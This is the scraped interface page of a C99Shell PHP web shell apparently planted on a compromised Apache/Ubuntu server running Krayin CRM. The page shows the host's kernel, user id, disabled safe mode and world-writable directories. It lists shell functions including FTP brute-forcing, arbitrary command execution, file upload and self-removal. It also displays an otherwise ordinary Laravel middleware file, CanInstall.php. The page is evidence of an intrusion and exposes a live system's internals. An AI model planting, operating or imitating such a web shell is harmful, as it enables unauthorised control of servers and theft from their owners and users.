!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/packages/Webkul/Installer/src/Http/Middleware/   drwxrwxrwx
Free 13.13 GB of 57.97 GB (22.65%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     CanInstall.php (1.23 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Webkul\Installer\Http\Middleware;

use 
Closure;
use 
Illuminate\Http\Request;
use 
Illuminate\Support\Facades\Event;
use 
Illuminate\Support\Str;
use 
Webkul\Installer\Helpers\DatabaseManager;

class 
CanInstall
{
    
/**
     * Handles Requests if application is already installed then redirect to dashboard else to installer.
     */
    
public function handle(Request $requestClosure $next): mixed
    
{
        if (
Str::contains($request->getPathInfo(), '/install')) {
            if (
$this->isAlreadyInstalled() && ! $request->ajax()) {
                return 
redirect()->route('admin.dashboard.index');
            }
        } else {
            if (! 
$this->isAlreadyInstalled()) {
                return 
redirect()->route('installer.index');
            }
        }

        return 
$next($request);
    }

    
/**
     * Check if application is already installed.
     */
    
public function isAlreadyInstalled(): bool
    
{
        if (
file_exists(storage_path('installed'))) {
            return 
true;
        }

        if (
app(DatabaseManager::class)->isInstalled()) {
            
touch(storage_path('installed'));

            
Event::dispatch('krayin.installed');

            return 
true;
        }

        return 
false;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0063 ]--